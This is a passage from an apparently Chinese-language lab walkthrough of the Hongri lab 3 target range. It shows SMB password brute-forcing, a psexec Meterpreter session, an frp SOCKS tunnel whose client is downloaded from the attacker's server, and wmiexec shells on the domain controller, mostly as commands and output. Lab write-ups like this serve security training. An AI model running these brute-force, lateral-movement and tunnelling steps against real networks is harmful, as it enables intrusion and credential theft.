[+] 192.168.93.20:445     -   Host is running Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[*] 192.168.93.30:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:19m 36s) (guid:{5333dd46-78d3-4896-baf2-21fde1d035bb}) (authentication domain:TEST)
[+] 192.168.93.30:445     -   Host is running Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)


得到192.168.93.10;192.168.93.20;192.168.93.30内网主机存活

3.爆破主机

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.10
set smbuser administrator		(用户名)
set pass_file /root/1000top          (字典)
set threads 20					(线程)
run
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.10
rhosts => 192.168.93.10
msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.10:445     - 192.168.93.10:445 - Starting SMB login bruteforce
[+] 192.168.93.10:445     - 192.168.93.10:445 - Success: '.\administrator:123qwe!ASD' Administrator
[*] 192.168.93.10:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.20
rhosts => 192.168.93.20
msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.20:445     - 192.168.93.20:445 - Starting SMB login bruteforce
[+] 192.168.93.20:445     - 192.168.93.20:445 - Success: '.\administrator:123qwe!ASD' Administrator
[*] 192.168.93.20:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.10
 
msf6 auxiliary(scanner/smb/smb_login) > run
 
[*] 192.168.93.10:445     - 192.168.93.10:445 - Starting SMB login bruteforce
[+] 192.168.93.10:445     - 192.168.93.10:445 - Success: '.\administrator:zxcASDqw123!!' Administrator
[*] 192.168.93.10:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

通过爆破得到内网主机的密码
192.168.93.30  administrator:123qwe!ASD
192.168.93.20  administrator:123qwe!ASD  
192.168.93.10  administrator:zxcASDqw123!!

4.psexec模块

msf6 exploit(multi/handler) > use exploit/windows/smb/psexec 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.115    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp

msf6 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD
smbpass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > run

[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'...
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Executing the payload...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (200774 bytes) to 192.168.93.30
[*] Meterpreter session 3 opened (192.168.93.100:56550 -> 192.168.93.30:4444 via session 2) at 2024-02-02 08:25:10 -0500

meterpreter > 

五.内网渗透

post/windows/gather/enum_domain模块用于在 Windows 系统中收集与域相关的信息。这个模块可以帮助攻击者获取有关域环境的一些重要信息,例如域控制器、域名、域用户和组等

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/enum_domain

[+] Domain FQDN: test.org
[+] Domain NetBIOS Name: TEST
[+] Domain Controller: WIN-8GA56TNV3MV.test.org (IP: 192.168.93.10)

C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : win7
   Primary Dns Suffix  . . . . . . . : test.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : test.org

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
   Physical Address. . . . . . . . . : 7C-B5-66-A5-F0-A9
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-A7-B1-B0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::c9d2:8e33:97e1:e872%11(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.93.30(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-53-70-00-0C-29-E0-74-2B
   DNS Servers . . . . . . . . . . . : 192.168.93.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{9155D380-FF00-44EB-AE88-938EA5D2CAB2}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{9629380D-4A5C-4D07-A7A0-B7A03D8A48F0}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

1.frp内网穿透

kali:
┌──(root㉿kali)-[~/tools/frp]
└─# python3 -m http.server 8888               
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.0.101 - - [02/Feb/2024 08:54:23] "GET /frpc HTTP/1.0" 200 -
192.168.0.101 - - [02/Feb/2024 08:54:27] "GET /frpc.ini HTTP/1.0" 200 -
^C
Keyboard interrupt received, exiting.
                                                                                                                                                                                    
┌──(root㉿kali)-[~/tools/frp]
└─# ./frps -c ./frps.ini                       
2024/02/02 08:55:29 [I] [root.go:200] frps uses config file: ./frps.ini
2024/02/02 08:55:29 [I] [service.go:194] frps tcp listen on 0.0.0.0:7000
2024/02/02 08:55:29 [I] [root.go:209] frps started successfully
2024/02/02 08:55:34 [I] [service.go:450] [7c5d43a8e8c3cd43] client login info: ip [192.168.0.101:50653] version [0.42.0] hostname [] os [linux] arch [amd64]
2024/02/02 08:55:34 [I] [tcp.go:64] [7c5d43a8e8c3cd43] [socks_proxy] tcp proxy listen port [8989]
2024/02/02 08:55:34 [I] [control.go:465] [7c5d43a8e8c3cd43] new proxy [socks_proxy] success

靶机:
[firefart@192 ~]# wget http://192.168.0.115:8888/frpc
--2019-10-07 01:24:28--  http://192.168.0.115:8888/frpc
正在连接 192.168.0.115:8888... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:10936320 (10M) [application/octet-stream]
正在保存至: “frpc”

100%[==========================================================================================================================================>] 10,936,320  25.9M/s   in 0.4s    

2019-10-07 01:24:29 (25.9 MB/s) - 已保存 “frpc” [10936320/10936320])

[firefart@192 ~]# wget http://192.168.0.115:8888/frpc.ini
--2019-10-07 01:24:32--  http://192.168.0.115:8888/frpc.ini
正在连接 192.168.0.115:8888... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:117 [application/octet-stream]
正在保存至: “frpc.ini”

100%[==========================================================================================================================================>] 117         --.-K/s   in 0s      

2019-10-07 01:24:32 (1.99 MB/s) - 已保存 “frpc.ini” [117/117])

[firefart@192 ~]# ls
anaconda-ks.cfg  frpc  frpc.ini  install.log  install.log.syslog  nginx-1.9.4  nginx-1.9.4.tar.gz  shell.elf
[firefart@192 ~]# cat frpc.ini
[common]
server_addr = 192.168.0.115
server_port = 7000

[socks_proxy]
type = tcp
remote_port = 8989
plugin = socks5
[firefart@192 ~]# chmod +x frpc
[firefart@192 ~]# ls
anaconda-ks.cfg  frpc  frpc.ini  install.log  install.log.syslog  nginx-1.9.4  nginx-1.9.4.tar.gz  shell.elf
[firefart@192 ~]# ./frpc -c frpc.ini &
[2] 11201
[firefart@192 ~]# 2019/10/07 01:25:39 [I] [service.go:349] [7c5d43a8e8c3cd43] login to server success, get run id [7c5d43a8e8c3cd43], server udp port [0]
2019/10/07 01:25:39 [I] [proxy_manager.go:144] [7c5d43a8e8c3cd43] proxy added: [socks_proxy]
2019/10/07 01:25:39 [I] [control.go:181] [7c5d43a8e8c3cd43] [socks_proxy] start proxy success
kali上proxychains4.conf中最后一行要写:socks5 127.0.0.1 8989

2.wmiexec工具

wmiexec-Pro.py 是一个Python脚本,它使用WMI(Windows Management Instrumentation)来执行远程命令。WMI是Windows操作系统中的一种管理基础设施,攻击者可以利用它来执行各种管理任务,从而实现对目标系统的控制。

git clone https://github.com/XiaoliChan/wmiexec-Pro.git
┌──(root㉿kali)-[~/kali/CVE/impacket/wmiexec-Pro-main]
└─# proxychains4 python3 wmiexec-pro.py 'administrator:[email protected]' exec-command -shell           
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:8989  ...  192.168.93.30:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8989  ...  192.168.93.30:49154  ...  OK

[+] Class: Win32_OSRecoveryConfigurationDataBackup has been created!
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\System32>nltest /DCLIST:124-hack
[+] Waiting 1s for next step.
[+] Results: 

Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully

C:\Windows\system32>netdom query pdc
[+] Waiting 1s for next step.
[+] Results: 

'netdom' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>nslookup -type=SRV _ldap._tcp   (**查看域控制器的主机名**)
[+] Waiting 1s for next step.
[+] Results: 

DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  192.168.93.10

_ldap._tcp.test.org     SRV service location:
          priority       = 0
          weight         = 100
          port           = 389
          svr hostname   = win-8ga56tnv3mv.test.org
win-8ga56tnv3mv.test.org        internet address = 192.168.93.10

3连接域控

┌──(root㉿kali)-[~/kali/CVE/impacket/wmiexec-Pro-main]
└─# proxychains4 python3 wmiexec-pro.py 'administrator:[email protected]' exec-command -shell
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:8989  ...  192.168.93.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8989  ...  192.168.93.10:49154  ...  OK

[+] Class: Win32_OSRecoveryConfigurationDataBackup has been created!
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\System32>

4.flag

flag在C:\Users\Administrator\Documents

C:\Windows\system32>cd C:/
[+] Waiting 1s for next step.
[+] Results: 



C:\>dir
[+] Waiting 1s for next step.
[+] Results: 

Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\

08/22/2013  11:52 PM              PerfLogs
10/28/2019  08:44 PM              Program Files
08/22/2013  11:39 PM              Program Files (x86)
10/06/2019  07:14 PM              Users
10/30/2019  10:31 PM              Windows
               0 File(s)              0 bytes
               5 Dir(s)  50,226,286,592 bytes free

C:\>cd user
[+] Waiting 1s for next step.
[+] Results: 

The system cannot find the path specified.

C:\>cd Users
[+] Waiting 1s for next step.
[+] Results: 



C:\Users>dir
[+] Waiting 1s for next step.
[+] Results: 

Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users

10/06/2019  07:14 PM              .
10/06/2019  07:14 PM              ..
10/06/2019  07:14 PM              Administrator
08/22/2013  11:39 PM              Public
               0 File(s)              0 bytes
               4 Dir(s)  50,226,266,112 bytes free

C:\Users>cat Administrator[proxychains] Strict chain  ...  127.0.0.1:8989  ...  192.168.93.10:135  ...  OK

[+] Waiting 1s for next step.
[+] Results: 

'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Users>type Administrator
[+] Waiting 1s for next step.
[+] Results: 

Access is denied.

C:\Users>cd Administrator
[+] Waiting 1s for next step.
[+] Results: 



C:\Users\Administrator>dir
[+] Waiting 1s for next step.
[+] Results: 

Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users\Administrator

10/06/2019  07:14 PM              .
10/06/2019  07:14 PM              ..
10/30/2019  10:12 PM              Contacts
10/31/2019  12:52 AM              Desktop
10/31/2019  12:52 AM              Documents
10/30/2019  10:12 PM              Downloads
10/30/2019  10:12 PM              Favorites
10/30/2019  10:12 PM              Links
10/30/2019  10:12 PM              Music
10/30/2019  10:12 PM              Pictures
10/30/2019  10:12 PM              Saved Games
10/30/2019  10:12 PM              Searches
10/30/2019  10:12 PM              Videos
               0 File(s)              0 bytes
              13 Dir(s)  50,225,737,728 bytes free
              

C:\Users\Administrator\Desktop>cd ../Documents
[+] Waiting 1s for next step.
[+] Results: 


C:\Users\Administrator\Documents>dir
[+] Waiting 1s for next step.
[+] Results: 

Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users\Administrator\Documents

10/31/2019  12:52 AM              .
10/31/2019  12:52 AM              ..
10/31/2019  12:53 AM                13 flag.txt
               1 File(s)             13 bytes
               2 Dir(s)  50,225,737,728 bytes free

C:\Users\Administrator\Documents>type flag.txt
[proxychains] Strict chain  ...  127.0.0.1:8989  ...  192.168.93.10:135  ...  OK
[+] Waiting 1s for next step.
[+] Results: 

this is flag!

你可能感兴趣的:(红日安全,红日三,靶机,Gaara靶机,redis,python,eclipse)